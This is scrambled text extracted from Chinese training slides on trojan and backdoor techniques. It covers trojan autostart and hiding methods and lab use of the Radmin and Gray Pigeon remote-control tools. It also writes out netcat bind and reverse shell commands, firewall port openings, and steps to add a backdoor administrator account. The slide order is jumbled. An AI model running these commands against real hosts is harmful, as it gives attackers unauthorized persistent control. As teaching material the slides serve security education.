木马后门攻击技术

3.3 用户态反向远程控制
（5）例：弄清如下代码的含义。 （a）主动控制。B控制A。
A 机：
➢ nc.exe -d -L -p 9000 -t -e c:\windows\system32\cmd.exe
B 机：
➢ telnet A的主机ip 9000 ➢ netsh firewall set portopening tcp 135 rpcs1 //服务名1，随便取
3.2 用户态正向远程控制
（3）Radmin远程控制软件 Radmin（Remote Administrator）是一款功能强
大的远程主机控制软件。用户利用它可在本地 监控远程主机的屏幕显示；在本地对远程主机 进行控制；对受控主机进行telnet登录。 Radmin对远程连接进行了优化，安全、易用、 高速，很多方面超过同类型远程控制软件。 使用Radmin时，一般需要修改默认端口，并增 加连接密码，以增强安全性。
3.1 木马简介
（4）木马常用传播和植入技术 通过邮件植入。 通过网页植入。 通过文件捆绑植入。 利用系统漏洞植入。 利用应用软件漏洞植入。
3.1 木马简介
（5）木马自启动技术 修改Win.ini文件。在Win.ini文件的[Windows]
字段中修改启动命令“load=”和“run=”。 修改注册表。
增删用户、调整用户所在的安全组、为用户增 加/删除/更改密码等。
打开/关闭防火墙、更改防火墙设置。 查看/杀死进程。 开启/关闭特定服务。
3.3 用户态反向远程控制
（4）补充练习（续）： 查看网络连接和端口信息。 开启/关闭Telnet服务。 查看/建立/删除共享连接。 设定定时任务。 实现远程主机的重启动/关机。 清楚日志等。
3.1 木马简介
（7）木马远程控制要实现的功能。 远程监视/远程控制。 记录各种口令信息。 获取系统信息。 限制系统功能。 远程控制功能。 点对点通信功能。
3. 木马后门攻击技术
3.1 木马简介 3.2 用户态正向远程控制 3.3 用户态反向远程控制 3.4 木马常用攻击技术（缓冲区溢出） 3.5 木马检测和防御
3.2 用户态正向远程控制
（4）使用Radmin进行远程控制（续） 步骤4：启动Radmin客户端。
3.2 用户态正向远程控制
（4）使用Radmin进行远程控制（续） 步骤5：设定服务器端IP及连接端口等参数。
3.2 用户态正向远程控制
（4）使用Radmin进行远程控制（续） 步骤6：对服务器端进行远程控制和操作。
以逃避防火墙等检查？端口更改有什么要求？ ➢ 查询google，如何判定本机感染了灰鸽子？ ➢ 如何清除灰鸽子？ ➢ 在灰鸽子提供的环境下（远程控制、Telent登
录等），尝试对远程主机做一些其他操作：开 启Telnet服务；杀死相关进程；创建用户等。
3.3 用户态反向远程控制
（4）补充练习：尝试使用Windows自带的命令行 工具，或者其他命令行工具，从命令行（不要 使用图形界面）实现对主机的相关管理和操作 ，如：
修改文件关联。打开注册表，修改文件的关联 属性，使得特定文件在打开时，先打开木马， 再打开特定文件。
修改系统服务程序。包括独立服务和Svchost共 享服务等。
3.1 木马简介
（6）木马隐藏技术。 任务栏隐藏。屏幕右下角的任务栏不出现图标
。 进程隐藏。进程查看工具，例如：进程管理器
、pslist等无法显示特定进程。 通信隐藏。尽可能隐藏木马的通信特征。
本地主机响应，建立连接成功 第三方服务器：IP+Port
远程主机 （Server）
3.3 用户态反向远程控制
（2）反向连接的代码：灰鸽子。 基本功能： ➢ 远程屏幕监视。 ➢ 远程系统控制。 ➢ 远程文件管理。 ➢ 远程注册表管理。 ➢ 远程视频监控。 ➢ 远程语音监控。 ➢ Telnet登录。
➢ HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion下所有以“Run”开头的主键。
➢ HKEY_USERS\.Default\Software\Microsoft\Windows\Cu rrentVersion下所有以“Run”开头的主键。
第1步
本地主机 （Client）
远程主机 （Server）
写入
第三方服务器：IP+Port
第2步
本地主机 （Client）
远程主机 （Server）
第三方服务器：IP+Port
读取
第3步
本地主机 （Client）
远程主机发出建立连接请求 第三方服务器：IP+Port
远程主机 （Server）
第4步
本地主机 （Client）
，下同 ➢ netsh firewall set portopening tcp 139 rpcs2 //rpcs2随便起 ➢ netsh firewall set portopening tcp 445 rpcs3 //rpcs3随便起 ➢ sc config tlntsvr start= auto //注意：=紧连start，auto前有空格
3.3 用户态反向远程控制
（3）使用灰鸽子进行远程控制（续）。 远程屏幕监视和远程控制功能 ： 和 。
3.3 用户态反向远程控制
（3）使用灰鸽子进行远程控制（续）。 视频语音功能： 。
3.3 用户态反向远程控制
（3）使用灰鸽子进行远程控制（续）。 Telnet功能： 。
3.3 用户态反向远程控制
3.3 用户态反向远程控制
（3）使用灰鸽子进行远程控制。 灰鸽子主界面——客户端与服务器端的统一。
3.3 用户态反向远程控制
（3）使用灰鸽子进行远程控制（续）。 灰鸽子服务器端参数配置：反向连接IP（客户
端IP）、服务器端安装特性、启动特性等。
3.3 用户态反向远程控制
（3）使用灰鸽子进行远程控制（续）。 启动灰鸽子客户端，等待远程主机上线。
3.2 用户态正向远程控制
（4）使用Radmin进行远程控制（续） 步骤7：远程连接访问控制设置——设定连接
密码、连接端口、允许远程连接的IP等。
木马后门攻击技术
3.1 木马简介 3.2 用户态正向远程控制 3.3 用户态反向远程控制 3.4 木马常用攻击技术（缓冲区溢出） 3.5 木马检测和防御
远程主机 （Server）
远程主机 （Server）
远程主机 （Server）
远程主机 （Server）
3.3 用户态反向远程控制
（1）反向远程控制模式（续）。 为什么要采用反向连接？ ➢ 防火墙。 ➢ 动态IP、局域网内部。
3.3 用户态反向远程控制
（1）反向远程控制模式（续）。 带第三方中间代理服务器的反向连接。
简称为木马，英文名称叫 做“Trojan horse”。 木马的名称来自于古希腊 传说荷马史诗中的木马计。 木马是一种基于远程控制的黑客工具，具有隐 蔽性和非授权性的特点。
3.1 木马简介
（1）什么是木马（续） 木马通过将自身进行伪装以吸引用户执行。一
旦用户误执行而感染了木马之后，攻击者就可 以任意破坏、窃取用户文件，甚至远程操控用 户的电脑。 目前，木马已经形成了一条集：“需求-编制销售-传播”于一体的黑色产业链，这条黑色产 业链每年有超百亿元人民币的收入。木马已成 为目前危害最大的恶意软件之一。
（3）使用灰鸽子进行远程控制（续）。 请对：“捕获屏幕”、“视频语音”、
“Telnet”功能进行尝试。 请对：“远程控制命令”、“注册表操作”、
“命令广播”等功能进行尝试。
3.3 用户态反向远程控制
（3）使用灰鸽子进行远程控制（续）。 进一步思考题： ➢ 如何为灰鸽子设置远程连接密码？ ➢ 灰鸽子的默认监听端口为多少？如何进行更改
3.2 用户态正向远程控制
（1）远程控制基本概念 本质上，远程控制是一种网络客户机/服务器（
Client/Server）的通信模式，服务器端向客户端 提供服务，客户端接受服务器端所提供的服务 。
客户端安装在攻击者的机器上，用来对服务器 端进行控制；服务器端安装在受害者的机器上 ，用来对客户端发出的命令进行响应，并提供 恶意服务。
➢ HKEY_LOCAL_MACHINE\Software\Microsoft\Window s\CurrentVersion下所有以“Run开头的某一主键”
3.1 木马简介
（5）木马自动启技术（续） 修改System.ini文件。在System.ini文件的[boot]
字段“shell=Explorer.exe”后添加受控程序路 径。
3.2 用户态正向远程控制
（4）使用Radmin进行远程控制 步骤1：解压缩Radmin软件。
3.2 用户态正向远程控制
（4）使用Radmin进行远程控制（续） 步骤2：Radmin服务器端配置。
3.2 用户态正向远程控制
（4）使用Radmin进行远程控制（续） 步骤3：安装Radmin并启动服务。
第四代：进程隐藏方面有了很大改进。如：内 核模块、进程注入等。
3.1 木马简介
（3）木马发展（续） 第五代：驱动级木马。大量使用Rootkit技术来
达到深入隐藏，并深入到内核空间。并主动对 杀毒软件和网络防火墙发起攻击。
第六代：黏虫技术类型和特殊反显技术类型木 马主键开始系统化。前者以盗取和篡改用户敏 感信息为主，后者以动态口令和硬证书攻击为 主。
木马后门攻击技术31木马简介32用户态正向远程控制33用户态反向远程控制34木马常用攻击技术缓冲区溢出35木马检测和防御32用户态正向远程控制1远程控制基本概念本质上远程控制是一种网络客户机服务器clientserver的通信模式服务器端向客户端提供服务客户端接受服务器端所提供的服务客户端安装在攻击者的机器上用来对服务器端进行控制
3.1 木马简介
（2）木马分类 网络游戏木马。 网银木马。 即时通讯软件木马。 网页点击类木马。 下载类木马。 代理类木马。
3.1 木马简介
（3）木马发展历程： 第一代：简单木马窃取、然后通过电子邮件发
送等。
第二代：技术上有很大改进。国内的冰河是此 时期的典型代表作。
第三代：在数据传递技术方面改进，出现了 ICMP木马等，利用畸形报文传递数据，增大 杀毒软件查杀难度。
3.3 用户态反向远程控制
（1）反向远程控制模式。
正向连接：
第1步
本地主机 （Client）
本地主机发出建立连接请求
第2步
本地主机 （Client）
远程主机响应，建立连接成功
反向连接：
第1步 第2步
本地主机 （Client）
本地主机 （Client）
远程主机发出建立连接请求 本地主机响应，建立连接成功
3.2 用户态正向远程控制
（2）正向远程控制的模式 客户端程序在控制主机上执行，服务器端程序
在受控主机上执行。 服务器端程序绑定在系统某个端口上进行监听
，一旦有来自客户端的连接请求，则服务器端 接受请求，和客户端建立连接通道。 连接通道建立成功之后，双方开始通信：客户 端发送指令，而服务器端则执行指令、传输数 据、返回结果等。
3.3 用户态反向远程控制
（5）例：弄清如下代码的含义（续）。
➢ sc config lanmanserver start= auto ➢ sc config schedule start= auto ➢ net start tlntsvr ➢ net start lanmanserver ➢ net start schedule ➢ net user admin 123456 /add ➢ net localgroup administrators admin /add ➢ net share admin$ ➢ at 时间 服务
木马后门攻击技术
杭州电子科技大学通信工程学院 2011年暑期信息安全培训 2011.07
3. 木马后门攻击技术
3.1 木马简介 3.2 用户态正向远程控制 3.3 用户态反向远程控制 3.4 木马常用攻击技术（缓冲区溢出） 3.5 木马检测和防御
3.1 木马简介
（1） 什么是木马 木马又叫特洛伊木马，其
3.3 用户态反向远程控制
（5）例：弄清如下代码的含义（续）。 （b）反向控制。A控制B。 A机：
➢ nc.exe -l -p 10000
B机：
➢ nc.exe -t -e c:\windows\system32\cmd.exe A的ip 10000
3. 木马后门攻击技术
3.1 木马简介 3.2 用户态正向远程控制 3.3 用户态反向远程控制 3.4 木马常用攻击技术（缓冲区溢出） 3.5 木马检测和防御